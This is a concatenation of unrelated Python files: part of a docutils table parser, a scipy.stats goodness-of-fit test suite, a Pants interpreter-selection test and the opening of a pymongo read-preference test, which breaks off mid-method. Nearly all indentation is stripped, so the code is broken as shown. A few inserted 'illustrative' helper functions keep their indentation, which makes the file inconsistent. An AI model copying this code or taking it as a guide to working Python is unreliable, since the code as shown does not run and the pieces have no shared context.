# Allow for an unbounded rightmost column:
cols[-1] = (cols[-1][0], self.columns[-1][1])
return cols
def init_row(self, colspec, offset):
i = 0
cells = []
for start, end in colspec:
morecols = 0
try:
assert start == self.columns[i][0]
while end != self.columns[i][1]:
i += 1
morecols += 1
except (AssertionError, IndexError):
raise TableMarkupError('Column span alignment problem '
'in table line %s.' % (offset+2),
offset=offset+1)
cells.append([0, morecols, offset, []])
i += 1
return cells
def parse_row(self, lines, start, spanline=None):
"""
Given the text `lines` of a row, parse it and append to `self.table`.
The row is parsed according to the current column spec (either
`spanline` if provided or `self.columns`). For each column, extract
text from each line, and check for text in column margins. Finally,
adjust for insignificant whitespace.
"""
if not (lines or spanline):
# No new row, just blank lines.
return
if spanline:
columns = self.parse_columns(*spanline)
span_offset = spanline[1]
else:
columns = self.columns[:]
span_offset = start
self.check_columns(lines, start, columns)
row = self.init_row(columns, start)
for i in range(len(columns)):
start, end = columns[i]
cellblock = lines.get_2D_block(0, start, len(lines), end)
cellblock.disconnect() # lines in cell can't sync with parent
cellblock.replace(self.double_width_pad_char, '')
row[i][3] = cellblock
self.table.append(row)
def check_columns(self, lines, first_line, columns):
"""
Check for text in column margins and text overflow in the last column.
Raise TableMarkupError if anything but whitespace is in column margins.
Adjust the end value for the last column if there is text overflow.
"""
# "Infinite" value for a dummy last column's beginning, used to
# check for text overflow:
columns.append((sys.maxsize, None))
lastcol = len(columns) - 2
# combining characters do not contribute to the column width
lines = [strip_combining_chars(line) for line in lines]
for i in range(len(columns) - 1):
start, end = columns[i]
nextstart = columns[i+1][0]
offset = 0
for line in lines:
if i == lastcol and line[end:].strip():
text = line[start:].rstrip()
new_end = start + len(text)
columns[i] = (start, new_end)
main_start, main_end = self.columns[-1]
if new_end > main_end:
self.columns[-1] = (main_start, new_end)
elif line[end:nextstart].strip():
raise TableMarkupError('Text in column margin '
'in table line %s.' % (first_line+offset+1),
offset=first_line+offset)
offset += 1
columns.pop()
def structure_from_cells(self):
colspecs = [end - start for start, end in self.columns]
first_body_row = 0
if self.head_body_sep:
for i in range(len(self.table)):
if self.table[i][0][2] > self.head_body_sep:
first_body_row = i
break
return (colspecs, self.table[:first_body_row],
self.table[first_body_row:])
def update_dict_of_lists(master, newdata):
"""
Extend the list values of `master` with those from `newdata`.
Both parameters must be dictionaries containing list values.
"""
for key, values in list(newdata.items()):
master.setdefault(key, []).extend(values)
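# Companion sketch (illustrative, not part of the original module): the
# equivalent demo for SimpleTableParser. Top and bottom borders use '=', the
# head/body separator is a second '=' line, and columns are separated by spaces.
def _simple_table_demo():
    from docutils.statemachine import StringList
    lines = ['=====  =====',
             'col 1  col 2',
             '=====  =====',
             '1      one',
             '2      two',
             '=====  =====']
    colspecs, headrows, bodyrows = SimpleTableParser().parse(StringList(lines))
    # colspecs -> [5, 5]; one head row and two body rows
    return colspecs, headrows, bodyrows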
|
|
# Copyright (c) 2014, Salesforce.com, Inc. All rights reserved.
# Copyright (c) 2015, Gamelan Labs, Inc.
# Copyright (c) 2016, Google, Inc.
# Copyright (c) 2016, Gamelan Labs, Inc.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# - Neither the name of Salesforce.com nor the names of its contributors
# may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import division
try:
from itertools import izip as zip
except ImportError:
pass
from itertools import product
import random
from unittest import skip
from unittest import TestCase
import numpy
import scipy.stats
from numpy import pi
from numpy.testing import rand
from goftests import get_dim
from goftests import multinomial_goodness_of_fit
from goftests import discrete_goodness_of_fit
from goftests import auto_density_goodness_of_fit
from goftests import mixed_density_goodness_of_fit
from goftests import split_discrete_continuous
from goftests import volume_of_sphere
from goftests import chi2sf
NUM_BASE_SAMPLES = 250
NUM_SAMPLES_SCALE = 1000
TEST_FAILURE_RATE = 5e-4
class TestMultinomialGoodnessOfFit(TestCase):
def test_multinomial_goodness_of_fit(self):
random.seed(0)
numpy.random.seed(0)
for dim in range(2, 20):
sample_count = int(1e5)
probs = numpy.random.dirichlet([1] * dim)
counts = numpy.random.multinomial(sample_count, probs)
p_good = multinomial_goodness_of_fit(probs, counts, sample_count)
self.assertGreater(p_good, TEST_FAILURE_RATE)
unif = [1 / dim] * dim
unif_counts = numpy.random.multinomial(sample_count, unif)
p_bad = multinomial_goodness_of_fit(probs, unif_counts,
sample_count)
self.assertLess(p_bad, TEST_FAILURE_RATE)
class TestVolumeOfSphere(TestCase):
def test_volume_of_sphere(self):
for r in [0.1, 1.0, 10.0]:
self.assertAlmostEqual(volume_of_sphere(1, r), 2 * r)
self.assertAlmostEqual(volume_of_sphere(2, r), pi * r ** 2)
self.assertAlmostEqual(volume_of_sphere(3, r), 4 / 3 * pi * r ** 3)
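# Cross-check sketch (illustrative, not part of the original tests): the three
# closed forms asserted above are special cases of the general n-ball volume
# V(n, r) = pi**(n/2) / Gamma(n/2 + 1) * r**n.
def _n_ball_volume(n, r):
    from scipy.special import gamma
    return pi ** (n / 2) / gamma(n / 2 + 1) * r ** n
# _n_ball_volume(1, r) == 2*r, _n_ball_volume(2, r) == pi*r**2,
# _n_ball_volume(3, r) == 4/3*pi*r**3 (up to floating-point error).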
SPLIT_EXAMPLES = [
(False, False, []),
(0, 0, []),
('abc', 'abc', []),
(0.0, None, [0.0]),
((), (), []),
([], (), []),
((0, ), (0, ), []),
([0], (0, ), []),
((0.0, ), (None, ), [0.0]),
([0.0], (None, ), [0.0]),
([True, 1, 'xyz', 3.14, [None, (), ([2.71],)]],
(True, 1, 'xyz', None, (None, (), ((None,),))),
[3.14, 2.71]),
(numpy.zeros(3), (None, None, None), [0.0, 0.0, 0.0]),
]
class TestSplitDiscreteContinuous(TestCase):
def test_split_continuous_discrete(self):
for mixed, discrete, continuous in SPLIT_EXAMPLES:
d, c = split_discrete_continuous(mixed)
self.assertEqual(d, discrete)
self.assertAlmostEqual(c, continuous)
class TestChi2CDF(TestCase):
def test_chi2cdf(self):
xlist = numpy.linspace(0, 100, 500)
slist = numpy.arange(1, 41, 1.5)
for s, x in product(slist, xlist):
self.assertAlmostEqual(scipy.stats.chi2.sf(x, s), chi2sf(x, s))
class DistributionTestBase(object):
"""Abstract base class for probability distribution unit tests.
This class supplies two test methods, :meth:`.test_goodness_of_fit`
and :meth:`.test_mixed_density_goodness_of_fit` for testing the
goodness of fit functions.
Subclasses must override and implement one class attribute and two
instance methods. The :attr:`.dist` class attribute must be set to
one of SciPy probability distribution constructors in
:mod:`scipy.stats`. The :meth:`.goodness_of_fit` method must return
the result of calling one of the goodness of fit functions being
    tested. The :meth:`.probabilities` method must return an object
representing the probabilities for each sample; the output depends
on the format of the inputs to the :meth:`.goodness_of_fit` method.
Subclasses may also set the :attr:`.params` attribute, which is a
list of tuples that will be provided as arguments to the underlying
SciPy distribution constructor as specified in :attr:`.dist`. If not
specified, random arguments will be provided.
If samples drawn from :attr:`.dist` must be modified in some way
before the PDF or PMF can be computed, then subclasses may override
the :meth:`._sample_postprocessing` method.
"""
#: The SciPy distribution constructor to test.
dist = None
#: An optional list of arguments to the distribution constructor.
#:
#: Each tuple in this list will be provided as the positional
#: arguments to the distribution constructor specified in
#: :attr:`.dist`. If not specified, random arguments will be
#: provided.
params = None
def setUp(self):
random.seed(0)
numpy.random.seed(0)
def _sample_postprocessing(self, sample):
"""Modify a sample drawn from the distribution.
This method returns a modified version of `sample`, but that
modification may be arbitrary. This modified sample is the one
for which the PDF and the goodness-of-fit are computed.
By default, this is a no-op, but subclasses may wish to override
this method to modify sample in some way.
"""
return sample
def dist_params(self):
# If there are no parameters, then we provide a random one.
if self.params is None:
params = [tuple(1 + rand(self.dist.numargs))]
else:
params = self.params
return params
def test_mixed_density_goodness_of_fit(self):
for param in self.dist_params():
dim = get_dim(self.dist.rvs(*param, size=2)[0])
sample_count = NUM_BASE_SAMPLES + NUM_SAMPLES_SCALE * dim
samples = self.dist.rvs(*param, size=sample_count)
samples = list(map(self._sample_postprocessing, samples))
probabilities = [self.pdf(sample, *param) for sample in samples]
gof = mixed_density_goodness_of_fit(samples, probabilities)
self.assertGreater(gof, TEST_FAILURE_RATE)
def test_good_fit(self):
for param in self.dist_params():
dim = get_dim(self.dist.rvs(*param, size=2)[0])
sample_count = NUM_BASE_SAMPLES + NUM_SAMPLES_SCALE * dim
samples = self.dist.rvs(*param, size=sample_count)
samples = list(map(self._sample_postprocessing, samples))
probabilities = [self.pdf(sample, *param) for sample in samples]
gof = self.goodness_of_fit(samples, probabilities)
self.assertGreater(gof, TEST_FAILURE_RATE)
def goodness_of_fit(self, samples, probabilities):
raise NotImplementedError
class ContinuousTestBase(DistributionTestBase):
"""Abstract base class for testing continuous probability distributions.
Concrete subclasses must set the :attr:`.dist` attribute to be the
constructor for a continuous probability distribution.
"""
def goodness_of_fit(self, samples, probabilities):
gof = auto_density_goodness_of_fit(samples, probabilities)
return gof
def pdf(self, *args, **kw):
return self.dist.pdf(*args, **kw)
class DiscreteTestBase(DistributionTestBase):
"""Abstract base class for testing discrete probability distributions.
Concrete subclasses must set the :attr:`.dist` attribute to be the
constructor for a discrete probability distribution.
"""
def goodness_of_fit(self, samples, probabilities):
probs_dict = dict(zip(samples, probabilities))
gof = discrete_goodness_of_fit(samples, probs_dict)
return gof
def pdf(self, *args, **kw):
return self.dist.pmf(*args, **kw)
#
# Multivariate probability distributions.
#
class TestMultivariateNormal(ContinuousTestBase, TestCase):
dist = scipy.stats.multivariate_normal
params = [
(numpy.ones(1), numpy.eye(1)),
(numpy.ones(2), numpy.eye(2)),
(numpy.ones(3), numpy.eye(3)),
]
class TestDirichlet(ContinuousTestBase, TestCase):
dist = scipy.stats.dirichlet
params = [
([2.0, 2.5],),
([2.0, 2.5, 3.0],),
([2.0, 2.5, 3.0, 3.5],),
]
def _sample_postprocessing(self, value):
"""Project onto all but the last dimension."""
return value[:-1]
#
# Discrete probability distributions.
#
class TestBernoulli(DiscreteTestBase, TestCase):
dist = scipy.stats.bernoulli
params = [(0.2, )]
class TestBinomial(DiscreteTestBase, TestCase):
dist = scipy.stats.binom
params = [(40, 0.4)]
@skip('')
class TestBoltzmann(DiscreteTestBase, TestCase):
dist = scipy.stats.boltzmann
class TestDiscreteLaplacian(DiscreteTestBase, TestCase):
dist = scipy.stats.dlaplace
params = [(0.8, )]
class TestGeometric(DiscreteTestBase, TestCase):
dist = scipy.stats.geom
params = [(0.1, )]
class TestHypergeometric(DiscreteTestBase, TestCase):
dist = scipy.stats.hypergeom
params = [(40, 14, 24)]
class TestLogSeries(DiscreteTestBase, TestCase):
dist = scipy.stats.logser
params = [(0.9, )]
class TestNegativeBinomial(DiscreteTestBase, TestCase):
dist = scipy.stats.nbinom
params = [(40, 0.4)]
class TestPlanck(DiscreteTestBase, TestCase):
dist = scipy.stats.planck
params = [(0.51, )]
class TestPoisson(DiscreteTestBase, TestCase):
dist = scipy.stats.poisson
params = [(20, )]
@skip('too sparse')
class TestRandInt(DiscreteTestBase, TestCase):
dist = scipy.stats.randint
class TestSkellam(DiscreteTestBase, TestCase):
dist = scipy.stats.skellam
@skip('bug?')
class TestZipf(DiscreteTestBase, TestCase):
dist = scipy.stats.zipf
params = [(1.2, )]
#
# Continuous probability distributions.
#
@skip('')
class TestAlpha(ContinuousTestBase, TestCase):
dist = scipy.stats.alpha
class TestAnglit(ContinuousTestBase, TestCase):
dist = scipy.stats.anglit
class TestArcsine(ContinuousTestBase, TestCase):
dist = scipy.stats.arcsine
class TestBeta(ContinuousTestBase, TestCase):
dist = scipy.stats.beta
params = [
(0.5, 0.5),
(0.5, 1.5),
(0.5, 2.5),
]
class TestBetaPrime(ContinuousTestBase, TestCase):
dist = scipy.stats.betaprime
class TestBradford(ContinuousTestBase, TestCase):
dist = scipy.stats.bradford
class TestBurr(ContinuousTestBase, TestCase):
dist = scipy.stats.burr
class TestCauchy(ContinuousTestBase, TestCase):
dist = scipy.stats.cauchy
class TestChi(ContinuousTestBase, TestCase):
dist = scipy.stats.chi
class TestChiSquared(ContinuousTestBase, TestCase):
dist = scipy.stats.chi2
class TestCosine(ContinuousTestBase, TestCase):
dist = scipy.stats.cosine
class TestDoubleGamma(ContinuousTestBase, TestCase):
dist = scipy.stats.dgamma
class TestDoubleWeibull(ContinuousTestBase, TestCase):
dist = scipy.stats.dweibull
class TestErlang(ContinuousTestBase, TestCase):
dist = scipy.stats.erlang
params = [(7, )]
class TestExponential(ContinuousTestBase, TestCase):
dist = scipy.stats.expon
params = [(7, )]
class TestExponentiallyModifiedNormal(ContinuousTestBase, TestCase):
dist = scipy.stats.exponnorm
class TestExponentiatedWeibull(ContinuousTestBase, TestCase):
dist = scipy.stats.exponweib
class TestExponentialPower(ContinuousTestBase, TestCase):
dist = scipy.stats.exponpow
class TestF(ContinuousTestBase, TestCase):
dist = scipy.stats.f
class TestFatigueLife(ContinuousTestBase, TestCase):
dist = scipy.stats.fatiguelife
class TestFisk(ContinuousTestBase, TestCase):
dist = scipy.stats.fisk
class TestFoldedCauchy(ContinuousTestBase, TestCase):
dist = scipy.stats.foldcauchy
class TestFoldedNormal(ContinuousTestBase, TestCase):
dist = scipy.stats.foldnorm
class TestFrechetRight(ContinuousTestBase, TestCase):
dist = scipy.stats.frechet_r
class TestFrechetLeft(ContinuousTestBase, TestCase):
dist = scipy.stats.frechet_l
class TestGeneralizedLogistic(ContinuousTestBase, TestCase):
dist = scipy.stats.genlogistic
class TestGeneralizedNormal(ContinuousTestBase, TestCase):
dist = scipy.stats.gennorm
class TestGeneralizedPareto(ContinuousTestBase, TestCase):
dist = scipy.stats.genpareto
class TestGeneralizedExponential(ContinuousTestBase, TestCase):
dist = scipy.stats.genexpon
class TestGeneralizedExtreme(ContinuousTestBase, TestCase):
dist = scipy.stats.genextreme
@skip('very slow')
class TestGaussHypergeometric(ContinuousTestBase, TestCase):
dist = scipy.stats.gausshyper
class TestGamma(ContinuousTestBase, TestCase):
dist = scipy.stats.gamma
class TestGeneralizedGamma(ContinuousTestBase, TestCase):
dist = scipy.stats.gengamma
class TestGeneralizedHalfLogistic(ContinuousTestBase, TestCase):
dist = scipy.stats.genhalflogistic
class TestGilbrat(ContinuousTestBase, TestCase):
dist = scipy.stats.gilbrat
class TestGompertz(ContinuousTestBase, TestCase):
dist = scipy.stats.gompertz
class TestGumbelRight(ContinuousTestBase, TestCase):
dist = scipy.stats.gumbel_r
class TestGumbelLeft(ContinuousTestBase, TestCase):
dist = scipy.stats.gumbel_l
class TestHalfCauchy(ContinuousTestBase, TestCase):
dist = scipy.stats.halfcauchy
class TestHalfLogistic(ContinuousTestBase, TestCase):
dist = scipy.stats.halflogistic
class TestHalfNormal(ContinuousTestBase, TestCase):
dist = scipy.stats.halfnorm
class TestHalfGeneralizedNormal(ContinuousTestBase, TestCase):
dist = scipy.stats.halfgennorm
class TestHyperbolicSecant(ContinuousTestBase, TestCase):
dist = scipy.stats.hypsecant
class TestInverseGamma(ContinuousTestBase, TestCase):
dist = scipy.stats.invgamma
class TestInverseGauss(ContinuousTestBase, TestCase):
dist = scipy.stats.invgauss
class TestInverseWeibull(ContinuousTestBase, TestCase):
dist = scipy.stats.invweibull
class TestJohnsonSB(ContinuousTestBase, TestCase):
dist = scipy.stats.johnsonsb
class TestJohnsonSU(ContinuousTestBase, TestCase):
dist = scipy.stats.johnsonsu
@skip('???')
class TestKolmogorovSmirnovOneSided(ContinuousTestBase, TestCase):
dist = scipy.stats.ksone
class TestKolmogorovSmirnovTwoSided(ContinuousTestBase, TestCase):
dist = scipy.stats.kstwobign
class TestLaplace(ContinuousTestBase, TestCase):
dist = scipy.stats.laplace
class TestLevy(ContinuousTestBase, TestCase):
dist = scipy.stats.levy
class TestLeftSkewedLevy(ContinuousTestBase, TestCase):
dist = scipy.stats.levy_l
@skip('???')
class TestLevyStable(ContinuousTestBase, TestCase):
dist = scipy.stats.levy_stable
class TestLogistic(ContinuousTestBase, TestCase):
dist = scipy.stats.logistic
class TestLogGamma(ContinuousTestBase, TestCase):
dist = scipy.stats.loggamma
class TestLogLaplace(ContinuousTestBase, TestCase):
dist = scipy.stats.loglaplace
class TestLogNormal(ContinuousTestBase, TestCase):
dist = scipy.stats.lognorm
class TestLomax(ContinuousTestBase, TestCase):
dist = scipy.stats.lomax
class TestMaxwell(ContinuousTestBase, TestCase):
dist = scipy.stats.maxwell
class TestMielke(ContinuousTestBase, TestCase):
dist = scipy.stats.mielke
class TestNakagami(ContinuousTestBase, TestCase):
dist = scipy.stats.nakagami
class TestNonCentralChiSquared(ContinuousTestBase, TestCase):
dist = scipy.stats.ncx2
class TestNonCentralF(ContinuousTestBase, TestCase):
dist = scipy.stats.ncf
params = [(27, 27, 0.415784417992)]
class TestNonCentralT(ContinuousTestBase, TestCase):
dist = scipy.stats.nct
class TestNormal(ContinuousTestBase, TestCase):
dist = scipy.stats.norm
class TestPareto(ContinuousTestBase, TestCase):
dist = scipy.stats.pareto
class TestPearson3(ContinuousTestBase, TestCase):
dist = scipy.stats.pearson3
class TestPowerLaw(ContinuousTestBase, TestCase):
dist = scipy.stats.powerlaw
class TestPowerNormal(ContinuousTestBase, TestCase):
dist = scipy.stats.powernorm
class TestRDistributed(ContinuousTestBase, TestCase):
dist = scipy.stats.rdist
class TestReciprocal(ContinuousTestBase, TestCase):
dist = scipy.stats.reciprocal
params = [tuple(numpy.array([0, 1]) + rand(1)[0])]
class TestRayleigh(ContinuousTestBase, TestCase):
dist = scipy.stats.rayleigh
class TestRice(ContinuousTestBase, TestCase):
dist = scipy.stats.rice
class TestReciprocalInverseGaussian(ContinuousTestBase, TestCase):
dist = scipy.stats.recipinvgauss
class TestSemicircular(ContinuousTestBase, TestCase):
dist = scipy.stats.semicircular
class TestT(ContinuousTestBase, TestCase):
dist = scipy.stats.t
class TestTrapz(ContinuousTestBase, TestCase):
dist = scipy.stats.trapz
params = [(1 / 3, 2 / 3)]
class TestTriangular(ContinuousTestBase, TestCase):
dist = scipy.stats.triang
params = [tuple(rand(1))]
class TestTruncatedExponential(ContinuousTestBase, TestCase):
dist = scipy.stats.truncexpon
class TestTruncatedNormal(ContinuousTestBase, TestCase):
dist = scipy.stats.truncnorm
params = [(0.1, 2.0)]
class TestTukeyLambda(ContinuousTestBase, TestCase):
dist = scipy.stats.tukeylambda
class TestUniform(ContinuousTestBase, TestCase):
dist = scipy.stats.uniform
class TestVonMises(ContinuousTestBase, TestCase):
dist = scipy.stats.vonmises
params = [tuple(1.0 + rand(1))]
class TestVonMisesLine(ContinuousTestBase, TestCase):
dist = scipy.stats.vonmises_line
class TestWald(ContinuousTestBase, TestCase):
dist = scipy.stats.wald
class TestWeibullMin(ContinuousTestBase, TestCase):
dist = scipy.stats.weibull_min
class TestWeibullMax(ContinuousTestBase, TestCase):
dist = scipy.stats.weibull_max
class TestWrappedCauchy(ContinuousTestBase, TestCase):
dist = scipy.stats.wrapcauchy
params = [(0.5,)]
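# Standalone sketch (illustrative, not part of the original tests): the
# goodness-of-fit helpers can also be used outside a TestCase. This mirrors
# TestMultinomialGoodnessOfFit above; the dimension and sample count are
# arbitrary choices.
def _multinomial_gof_sketch(sample_count=100000, dim=5, seed=0):
    numpy.random.seed(seed)
    probs = numpy.random.dirichlet([1] * dim)
    counts = numpy.random.multinomial(sample_count, probs)
    # A p-value well above TEST_FAILURE_RATE (5e-4) means the counts are
    # consistent with probs.
    return multinomial_goodness_of_fit(probs, counts, sample_count)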
|
|
# Copyright 2016 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import json
import os
import unittest.mock
from textwrap import dedent
from typing import Tuple
from pex.interpreter import PythonInterpreter
from pants.backend.python.interpreter_cache import PythonInterpreterCache
from pants.backend.python.targets.python_library import PythonLibrary
from pants.backend.python.targets.python_requirement_library import PythonRequirementLibrary
from pants.backend.python.tasks.select_interpreter import SelectInterpreter
from pants.base.exceptions import TaskError
from pants.option.ranked_value import RankedValue
from pants.python.python_setup import PythonSetup
from pants.testutil.task_test_base import TaskTestBase
from pants.util.dirutil import chmod_plus_x, safe_mkdtemp
class SelectInterpreterTest(TaskTestBase):
@classmethod
def task_type(cls):
return SelectInterpreter
def setUp(self):
super().setUp()
# We're tied tightly to pex implementation details here faking out a python binary that outputs
# only one value no matter what arguments, environment or input stream it has attached. That
# value is the interpreter identity which is a JSON dict with exactly the following keys:
# binary, python_tag, abi_tag, platform_tag, version, supported_tags, env_markers.
def fake_interpreter(python_tag: str, abi_tag: str, version: Tuple[int, int, int]):
interpreter_dir = safe_mkdtemp()
binary = os.path.join(interpreter_dir, "python")
values = dict(
binary=binary,
python_tag=python_tag,
abi_tag=abi_tag,
platform_tag="",
version=version,
supported_tags=[],
env_markers={},
)
id_str = json.dumps(values)
with open(binary, "w") as fp:
fp.write(
dedent(
f"""
#!{PythonInterpreter.get().binary}
from __future__ import print_function
print({id_str!r})
"""
).strip()
)
chmod_plus_x(binary)
return PythonInterpreter.from_binary(binary)
        # python_tag, abi_tag, version = (major, minor, patch)
self.fake_interpreters = [
fake_interpreter(python_tag="ip", abi_tag="ip2", version=(2, 77, 777)),
fake_interpreter(python_tag="ip", abi_tag="ip2", version=(2, 88, 888)),
fake_interpreter(python_tag="ip", abi_tag="ip2", version=(2, 99, 999)),
]
self.set_options_for_scope(
PythonSetup.options_scope,
interpreter_constraints=RankedValue(RankedValue.CONFIG, ["IronPython>=2.55"]),
interpreter_search_paths=[interpreter.binary for interpreter in self.fake_interpreters],
)
self.reqtgt = self.make_target(
spec="req", target_type=PythonRequirementLibrary, requirements=[],
)
self.tgt1 = self._fake_target("tgt1")
self.tgt2 = self._fake_target("tgt2", compatibility=["IronPython>2.77.777"])
self.tgt3 = self._fake_target("tgt3", compatibility=["IronPython>2.88.888"])
self.tgt4 = self._fake_target("tgt4", compatibility=["IronPython<2.99.999"])
self.tgt20 = self._fake_target("tgt20", dependencies=[self.tgt2])
self.tgt30 = self._fake_target("tgt30", dependencies=[self.tgt3])
self.tgt40 = self._fake_target("tgt40", dependencies=[self.tgt4])
def _fake_target(self, spec, compatibility=None, sources=None, dependencies=None):
return self.make_target(
spec=spec,
target_type=PythonLibrary,
sources=sources or [],
dependencies=dependencies,
compatibility=compatibility,
)
def _select_interpreter(self, target_roots, should_invalidate=None):
context = self.context(target_roots=target_roots)
task = self.create_task(context)
if should_invalidate is not None:
task._select_interpreter = unittest.mock.MagicMock(wraps=task._select_interpreter)
task.execute()
if should_invalidate is not None:
if should_invalidate:
task._select_interpreter.assert_called_once()
else:
task._select_interpreter.assert_not_called()
return context.products.get_data(PythonInterpreter)
def _select_interpreter_and_get_version(self, target_roots, should_invalidate=None):
"""Return the version string of the interpreter selected for the target roots."""
interpreter = self._select_interpreter(target_roots, should_invalidate)
self.assertTrue(isinstance(interpreter, PythonInterpreter))
return interpreter.version_string
def test_interpreter_selection(self):
self.assertIsNone(self._select_interpreter([]))
self.assertEqual(
"IronPython-2.77.777", self._select_interpreter_and_get_version([self.reqtgt])
)
self.assertEqual(
"IronPython-2.77.777", self._select_interpreter_and_get_version([self.tgt1])
)
self.assertEqual(
"IronPython-2.88.888", self._select_interpreter_and_get_version([self.tgt2])
)
self.assertEqual(
"IronPython-2.99.999", self._select_interpreter_and_get_version([self.tgt3])
)
self.assertEqual(
"IronPython-2.77.777", self._select_interpreter_and_get_version([self.tgt4])
)
self.assertEqual(
"IronPython-2.88.888", self._select_interpreter_and_get_version([self.tgt20])
)
self.assertEqual(
"IronPython-2.99.999", self._select_interpreter_and_get_version([self.tgt30])
)
self.assertEqual(
"IronPython-2.77.777", self._select_interpreter_and_get_version([self.tgt40])
)
self.assertEqual(
"IronPython-2.99.999", self._select_interpreter_and_get_version([self.tgt2, self.tgt3])
)
self.assertEqual(
"IronPython-2.88.888", self._select_interpreter_and_get_version([self.tgt2, self.tgt4])
)
with self.assertRaises(TaskError) as cm:
self._select_interpreter_and_get_version([self.tgt3, self.tgt4])
self.assertIn(
"Unable to detect a suitable interpreter for compatibilities: "
"IronPython<2.99.999 && IronPython>2.88.888",
str(cm.exception),
)
def test_invalidation_for_target_constraints(self):
tgta = self._fake_target(
"tgta", compatibility=["IronPython>2.77.777"], dependencies=[self.tgt3]
)
self.assertEqual(
"IronPython-2.99.999",
self._select_interpreter_and_get_version([tgta], should_invalidate=True),
)
# A new target with different sources, but identical compatibility, shouldn't invalidate.
self.create_file("tgtb/foo/bar/baz.py", "fake content")
tgtb = self._fake_target(
"tgtb",
compatibility=["IronPython>2.77.777"],
dependencies=[self.tgt3],
sources=["foo/bar/baz.py"],
)
self.assertEqual(
"IronPython-2.99.999",
self._select_interpreter_and_get_version([tgtb], should_invalidate=False),
)
def test_invalidation_for_global_constraints(self):
# Because the system is setup with interpreter constraints, the task should
# invalidate on the first run.
self._select_interpreter_and_get_version([self.tgt1], should_invalidate=True)
self.set_options_for_scope(
PythonSetup.options_scope,
interpreter_constraints=RankedValue(RankedValue.CONFIG, ["IronPython>2.77.777"]),
)
# After changing the global interpreter constraints, the task should invalidate.
self._select_interpreter_and_get_version([self.tgt1], should_invalidate=True)
# If the global constraints don't change, the task should not invalidate.
self._select_interpreter_and_get_version([self.tgt1], should_invalidate=False)
def test_compatibility_AND(self):
tgt = self._fake_target("tgt5", compatibility=["IronPython>2.77.777,<2.99.999"])
self.assertEqual("IronPython-2.88.888", self._select_interpreter_and_get_version([tgt]))
def test_compatibility_AND_impossible(self):
tgt = self._fake_target("tgt5", compatibility=["IronPython>2.77.777,<2.88.888"])
with self.assertRaises(PythonInterpreterCache.UnsatisfiableInterpreterConstraintsError):
self._select_interpreter_and_get_version([tgt])
def test_compatibility_OR(self):
tgt = self._fake_target("tgt6", compatibility=["IronPython>2.88.888", "IronPython<2.7"])
self.assertEqual("IronPython-2.99.999", self._select_interpreter_and_get_version([tgt]))
def test_compatibility_OR_impossible(self):
tgt = self._fake_target(
"tgt6", compatibility=["IronPython>2.99.999", "IronPython<2.77.777"]
)
with self.assertRaises(PythonInterpreterCache.UnsatisfiableInterpreterConstraintsError):
self._select_interpreter_and_get_version([tgt])
def test_stale_binary_detected(self):
interpreter1 = self._select_interpreter([self.tgt2])
os.remove(interpreter1.binary)
interpreter2 = self._select_interpreter([self.tgt2])
self.assertNotEqual(interpreter1.binary, interpreter2.binary)
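# Side note (illustrative, not part of the original test): the compatibility
# strings above use standard requirement syntax, so the AND semantics of a
# single constraint string can be sanity-checked with pkg_resources directly.
# The actual selection in the task goes through PythonInterpreterCache/pex.
def _constraint_sketch():
    from pkg_resources import Requirement
    req = Requirement.parse("IronPython>2.77.777,<2.99.999")
    return "2.88.888" in req, "2.99.999" in req  # -> (True, False)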
|
|
# Copyright 2011-2015 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the replica_set_connection module."""
import contextlib
import random
import sys
sys.path[0:0] = [""]
from bson.py3compat import MAXSIZE
from bson.son import SON
from pymongo.errors import ConfigurationError
from pymongo.message import _maybe_add_read_preference
from pymongo.mongo_client import MongoClient
from pymongo.read_preferences import (ReadPreference, MovingAverage,
Primary, PrimaryPreferred,
Secondary, SecondaryPreferred,
Nearest, _ServerMode)
from pymongo.server_selectors import any_server_selector
from pymongo.server_type import SERVER_TYPE
from pymongo.write_concern import WriteConcern
from test.test_replica_set_client import TestReplicaSetClientBase
from test import (SkipTest,
client_context,
host,
port,
unittest,
db_user,
db_pwd)
from test.utils import single_client, one, wait_until, rs_client
from test.version import Version
class TestReadPreferencesBase(TestReplicaSetClientBase):
def setUp(self):
super(TestReadPreferencesBase, self).setUp()
# Insert some data so we can use cursors in read_from_which_host
self.client.pymongo_test.test.drop()
self.client.get_database(
"pymongo_test",
write_concern=WriteConcern(w=self.w)).test.insert_many(
[{'_id': i} for i in range(10)])
self.addCleanup(self.client.pymongo_test.test.drop)
def read_from_which_host(self, client):
"""Do a find() on the client and return which host was used
"""
cursor = client.pymongo_test.test.find()
next(cursor)
return cursor.address
def read_from_which_kind(self, client):
"""Do a find() on the client and return 'primary' or 'secondary'
depending on which the client used.
"""
address = self.read_from_which_host(client)
if address == client.primary:
return 'primary'
elif address in client.secondaries:
